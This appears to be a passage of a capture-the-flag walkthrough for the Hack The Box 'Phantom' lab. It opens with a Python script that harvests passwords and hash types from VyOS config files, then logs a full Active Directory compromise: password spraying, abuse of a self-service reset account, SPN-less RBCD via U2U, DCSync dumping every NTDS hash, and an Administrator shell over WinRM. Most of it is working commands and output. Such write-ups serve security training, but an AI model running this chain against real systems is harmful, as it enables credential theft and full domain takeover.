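from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Leaf keys in a VyOS config that carry a secret (assumed list). "key" and
# "public-keys" are deliberately left out: they usually hold SSH public keys.
CRED_KEYS = {"password", "encrypted-password", "plaintext-password",
             "pre-shared-secret", "secret", "passphrase", "radius-key"}

# crypt(3) prefix -> (scheme, hashcat mode); None = no hashcat mode for it
HASH_SCHEMES: Dict[str, Tuple[str, Optional[int]]] = {
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
    "$y$": ("yescrypt", None),
}

# Constructed sample in config.boot syntax; the hash and secrets are placeholders.
SAMPLE_CONFIG_BOOT = r"""
interfaces {
    ethernet eth0 {
        address 192.0.2.1/24
    }
}
protocols {
    bgp 65001 {
        neighbor 192.0.2.9 {
            password "Example-Pass-123"
        }
    }
}
system {
    host-name vyos
    login {
        user vyos {
            authentication {
                encrypted-password "$6$rounds=656000$constructedsalt$constructedhash"
                plaintext-password ""
            }
        }
    }
}
vpn {
    ipsec {
        site-to-site {
            peer 198.51.100.5 {
                authentication {
                    mode pre-shared-secret
                    pre-shared-secret "Example-PSK-1"
                }
            }
        }
    }
}
// Warning: Do not remove the following line.
// vyos-config-version: "constructed"
"""


@dataclass
class Credential:
    path: str    # space-joined config path, e.g. "system login user vyos authentication"
    key: str
    value: str
    kind: str    # "plaintext" or "<scheme> (hashcat -m N)"


def classify(value: str) -> str:
    """Tell a crypt(3) hash from a plaintext value and name the hashcat mode for it."""
    for prefix, (scheme, mode) in HASH_SCHEMES.items():
        if value.startswith(prefix):
            return f"{scheme} (hashcat -m {mode})" if mode is not None else scheme
    return "plaintext"


def parse_vyos_config(text: str) -> List[Credential]:
    """Walk the brace-nested syntax and collect every non-empty secret leaf with its path."""
    stack: List[str] = []
    found: List[Credential] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("/*", "//")):   # trailing version comments
            continue
        if line.endswith("{"):                          # "system {", "user vyos {"
            stack.append(line[:-1].strip())
            continue
        if line == "}":
            if stack:
                stack.pop()
            continue
        key, _, value = line.partition(" ")
        value = value.strip().strip('"')
        if key in CRED_KEYS and value:                  # plaintext-password "" is noise
            found.append(Credential(" ".join(stack), key, value, classify(value)))
    return found


if __name__ == "__main__":
    import sys
    # Usage: python3 vyos_secrets.py config/config.boot   (or run bare for the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG_BOOT
    for c in parse_vyos_config(text):
        print(f"{c.kind:32} {c.path} :: {c.key} = {c.value}")
```

Run it over config.boot and over each decompressed archive/config.boot.N.gz; a plaintext hit is sprayed directly, a sha512crypt hit goes to hashcat -m 1800 with the same short wordlist.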
Spray it over the user list:
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u valid_users -p 'gB6XTcqVP5MlP7Rc' --continue-on-success
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [-] phantom.vl\Administrator:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\Guest:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\krbtgt:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\DC$:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
SMB 10.129.234.63 445 DC [-] phantom.vl\rnichols:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\pharrison:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wsilva:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\elynch:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\nhamilton:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\lstanley:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\bbarnes:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cjones:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\agarcia:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ppayne:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ibryant:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssteward:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wstewart:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vhoward:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\crose:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\twright:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\fhanson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cferguson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\alucas:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ebryant:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vlynch:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ghall:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssimpson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ccooper:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vcunningham:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc' --generate-tgt svc_sspr
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
SMB 10.129.234.63 445 DC [+] TGT saved to: svc_sspr.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=svc_sspr.ccache
Bingo: svc_sspr is ours. The transcript then jumps to rnichols with the password Admin123. That is not a discovered credential: svc_sspr is the self-service password reset account (note the SSPR Service group in the RID listing), and rnichols's password was presumably reset to Admin123 through it; the reset command itself is not captured in this log. The ccache name phichols below is a typo for rnichols and is harmless.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u RNICHOLS -p 'Admin123' --generate-tgt phichols
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\RNICHOLS:Admin123
SMB 10.129.234.63 445 DC [+] TGT saved to: phichols.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=phichols.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# export KRB5CCNAME=phichols.ccache
Check the basic preconditions for an RBCD attack:
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc ldap 10.129.234.63 -u RNICHOLS -p 'Admin123' -M maq
LDAP 10.129.234.63 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.63 389 DC [+] phantom.vl\RNICHOLS:Admin123
MAQ 10.129.234.63 389 DC [*] Getting the MachineAccountQuota
MAQ 10.129.234.63 389 DC MachineAccountQuota: 0
MachineAccountQuota is 0, so we cannot create a computer account of our own to act as the delegating service.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object RNICHOLS --attr servicePrincipalName
distinguishedName: CN=Rita Nichols,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object WSILVA --attr servicePrincipalName
distinguishedName: CN=Willard Silva,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object CROSE --attr servicePrincipalName
distinguishedName: CN=Chloe Rose,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
Three candidate accounts in the IT OU were checked: none of them has an SPN, and we have no right to write their servicePrincipalName attribute either.
This is the classic SPN-less RBCD (U2U) case.
First, on DC$, set msDS-AllowedToActOnBehalfOfOtherIdentity to an account whose plaintext password we know; here that is RNICHOLS. Before writing, confirm we actually hold that right on DC$:
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object 'DC$' --resolve-sd
distinguishedName: CN=DC,OU=Domain Controllers,DC=phantom,DC=vl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-10-26 14:43:12.684534+00:00
badPwdCount: 1
cn: DC
codePage: 0
countryCode: 0
dNSHostName: DC.phantom.vl
dSCorePropagationData: 2024-07-04 15:02:25+00:00
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-10-26 13:32:05.981512+00:00
lastLogonTimestamp: 2025-10-26 13:02:41.809652+00:00
localPolicyFlags: 0
logonCount: 82
msDFSR-ComputerReferenceBL: CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=phantom,DC=vl
msDS-GenerationId: CVPPGsDxzfo=
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
>>>> nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
>>>> nTSecurityDescriptor.ACL.0.Trustee: ICT Security
>>>> nTSecurityDescriptor.ACL.0.Right: WRITE_PROP
>>>>>nTSecurityDescriptor.ACL.0.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
This shows that members of ICT Security hold WRITE_PROP on ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity of DC$, so the write below, made with the rnichols ticket, goes through:
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k add rbcd 'DC$' S-1-5-21-4029599044-1972224926-2225194048-1112
[!] No security descriptor has been returned, a new one will be created
[+] S-1-5-21-4029599044-1972224926-2225194048-1112 can now impersonate users on DC$ via S4U2Proxy
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object 'DC$' --resolve-sd
distinguishedName: CN=DC,OU=Domain Controllers,DC=phantom,DC=vl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-10-26 14:43:12.684534+00:00
badPwdCount: 1
cn: DC
codePage: 0
countryCode: 0
dNSHostName: DC.phantom.vl
dSCorePropagationData: 2024-07-04 15:02:25+00:00
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-10-26 13:32:05.981512+00:00
lastLogonTimestamp: 2025-10-26 13:02:41.809652+00:00
localPolicyFlags: 0
logonCount: 82
msDFSR-ComputerReferenceBL: CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=phantom,DC=vl
>>>> msDS-AllowedToActOnBehalfOfOtherIdentity.Owner: BUILTIN_ADMINISTRATORS
msDS-AllowedToActOnBehalfOfOtherIdentity.Control: DACL_PRESENT|SELF_RELATIVE
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Type: == ALLOWED ==
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Trustee: S-1-5-21-4029599044-1972224926-2225194048-1112
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Right: CONTROL_ACCESS
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.ObjectType: Self
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Flags: CONTAINER_INHERIT; OBJECT_INHERIT
RBCD is now configured; the trustee in the new descriptor is S-1-5-21-4029599044-1972224926-2225194048-1112, i.e. rnichols (RID 1112 in the RID enumeration above).
Next, compute the NT hash of the plaintext password (MD4 over the UTF-16LE encoding):
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
e45a314c664d40a227f9540121d1a29d
Request a TGT with that NT hash instead of the password. Authenticating with the RC4 key makes the KDC issue a TGT whose session key is rc4_hmac, i.e. 16 bytes, the size of an NT hash; the next step depends on that.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u RNICHOLS -H e45a314c664d40a227f9540121d1a29d --generate-tgt rhichols_hash
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\RNICHOLS:e45a314c664d40a227f9540121d1a29d
SMB 10.129.234.63 445 DC [+] TGT saved to: rhichols_hash.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=rhichols_hash.ccache
Read the session key out of the ccache with impacket-describeTicket:
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-describeTicket rhichols_hash.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : e433109394a156b8ed64c905ce67409b
[*] User Name : RNICHOLS
[*] User Realm : PHANTOM.VL
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Start Time : 26/10/2025 11:03:36 AM
[*] End Time : 26/10/2025 21:03:36 PM
[*] RenewTill : 27/10/2025 11:03:33 AM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : 5DMQk5ShVrjtZMkFzmdAmw==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
The final "Could not find the correct encryption key" line is expected: the ticket body is encrypted with the krbtgt key, which we do not hold, and only the session key is needed. Now set RNICHOLS's NT hash to that session key with impacket-changepasswd. This is the core of the SPN-less trick: the S4U2self ticket obtained through U2U is encrypted with the TGT session key, and during S4U2proxy the KDC decrypts that ticket with the account's long-term key, so the two must be equal. As the tool warns, setting hashes is a reset rather than a change and the account may be flagged to change its password at next logon; record it for clean-up.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-changepasswd -newhashes :e433109394a156b8ed64c905ce67409b 'phantom.vl/RNICHOLS:Admin123@dc.phantom.vl' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of phantom.vl\RNICHOLS
[*] Connecting to DCE/RPC as phantom.vl\RNICHOLS
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set)
Then impacket-getST: S4U2self through U2U (the TGT itself is the additional ticket), followed by S4U2proxy to cifs/dc.phantom.vl impersonating Administrator. KRB5CCNAME must point at rhichols_hash.ccache, the TGT whose session key is now the account's NT hash; that export is not shown in this log.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-getST -u2u -impersonate 'Administrator' -spn 'cifs/dc.phantom.vl' -k -no-pass 'phantom.vl'/'RNICHOLS'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
Then DCSync with the Administrator service ticket (export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache first; nxc --ntds uses DRSUAPI replication by default, which is DCSync):
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u administrator -k --use-kcache --ntds
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\administrator from ccache (Pwn3d!)
SMB 10.129.234.63 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.234.63 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa2abd9db4f5984e657f834484512117:::
SMB 10.129.234.63 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.234.63 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:de0c6c1bf90cdc90ed73c2b765793df6:::
SMB 10.129.234.63 445 DC phantom.vl\svc_sspr:1103:aad3b435b51404eeaad3b435b51404ee:8ecffccc2f22c1607b8e104296ffbf68:::
SMB 10.129.234.63 445 DC PHANTOM.vl\rnichols:1112:aad3b435b51404eeaad3b435b51404ee:e433109394a156b8ed64c905ce67409b:::
SMB 10.129.234.63 445 DC PHANTOM.vl\pharrison:1113:aad3b435b51404eeaad3b435b51404ee:744cc56188561af3c16a8d0cd1e758d1:::
SMB 10.129.234.63 445 DC PHANTOM.vl\wsilva:1114:aad3b435b51404eeaad3b435b51404ee:a481bb1b52c2a40fef6b9f0d22df5a7b:::
SMB 10.129.234.63 445 DC PHANTOM.vl\elynch:1115:aad3b435b51404eeaad3b435b51404ee:753389c36525eaa2182d2366e21cb37e:::
SMB 10.129.234.63 445 DC PHANTOM.vl\nhamilton:1116:aad3b435b51404eeaad3b435b51404ee:2d3aa57851c7686d3d3df4c2bf3ebbb8:::
SMB 10.129.234.63 445 DC PHANTOM.vl\lstanley:1117:aad3b435b51404eeaad3b435b51404ee:3945cd9505e0eca3621a4b61506a131a:::
SMB 10.129.234.63 445 DC PHANTOM.vl\bbarnes:1118:aad3b435b51404eeaad3b435b51404ee:8b86efbee20746efcf97d50081a7ada9:::
SMB 10.129.234.63 445 DC PHANTOM.vl\cjones:1119:aad3b435b51404eeaad3b435b51404ee:0253df7e458eedfc1b511ae1eadad057:::
SMB 10.129.234.63 445 DC PHANTOM.vl\agarcia:1120:aad3b435b51404eeaad3b435b51404ee:54199065e48fae91d67176d5d2c3d506:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ppayne:1121:aad3b435b51404eeaad3b435b51404ee:e628d1e4d23696da908acc1add7efbe4:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ibryant:1122:aad3b435b51404eeaad3b435b51404ee:ca996d2266c0e306701b78a06e3c29ab:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ssteward:1123:aad3b435b51404eeaad3b435b51404ee:5839c34d11b418846131f6944be80ca6:::
SMB 10.129.234.63 445 DC PHANTOM.vl\wstewart:1124:aad3b435b51404eeaad3b435b51404ee:1d2256228378d2093d25f5122981bcde:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vhoward:1125:aad3b435b51404eeaad3b435b51404ee:fc97143b237f56c06e0d4f4bff1c7a09:::
SMB 10.129.234.63 445 DC PHANTOM.vl\crose:1126:aad3b435b51404eeaad3b435b51404ee:e9ad6ec6bd0ab88c16169b16114b216f:::
SMB 10.129.234.63 445 DC PHANTOM.vl\twright:1127:aad3b435b51404eeaad3b435b51404ee:f082f34b171dd47297674c2be83991b7:::
SMB 10.129.234.63 445 DC PHANTOM.vl\fhanson:1128:aad3b435b51404eeaad3b435b51404ee:3ecba7b39ce4b3fbe05362d6e05d31d0:::
SMB 10.129.234.63 445 DC PHANTOM.vl\cferguson:1129:aad3b435b51404eeaad3b435b51404ee:74bb37fa58020392821cdb89b5098f2d:::
SMB 10.129.234.63 445 DC PHANTOM.vl\alucas:1130:aad3b435b51404eeaad3b435b51404ee:53bd6a54d3dd605385e55f3226b0814d:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ebryant:1131:aad3b435b51404eeaad3b435b51404ee:abf123fca11a39c94bd92505f61c12a5:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vlynch:1132:aad3b435b51404eeaad3b435b51404ee:c6837ff88c25daea76b0f390f7ab0552:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ghall:1133:aad3b435b51404eeaad3b435b51404ee:a1ca032e6023ddeedd9009d4c0a8c836:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ssimpson:1134:aad3b435b51404eeaad3b435b51404ee:1c029611755dfa697b1996f88a8d9c17:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ccooper:1135:aad3b435b51404eeaad3b435b51404ee:fc35a773ba47633c4c1a807f91e9d496:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vcunningham:1136:aad3b435b51404eeaad3b435b51404ee:c187274e5ff6a96c44bce6200d6e7944:::
SMB 10.129.234.63 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:648605bbb93c66d7754580cb850957fc:::
SMB 10.129.234.63 445 DC [+] Dumped 30 NTDS hashes to /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds of which 29 were added to the database
SMB 10.129.234.63 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.234.63 445 DC [*] cat /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.234.63 445 DC [*] grep -iv disabled /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds | cut -d ':' -f1
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u administrator -H aa2abd9db4f5984e657f834484512117 --generate-tgt administrator
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\administrator:aa2abd9db4f5984e657f834484512117 (Pwn3d!)
SMB 10.129.234.63 445 DC [+] TGT saved to: administrator.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# export KRB5CCNAME=administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# evil-winrm-dev -i dc.phantom.vl -r phantom.vl
Evil-WinRM shell v3.8
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
phantom\administrator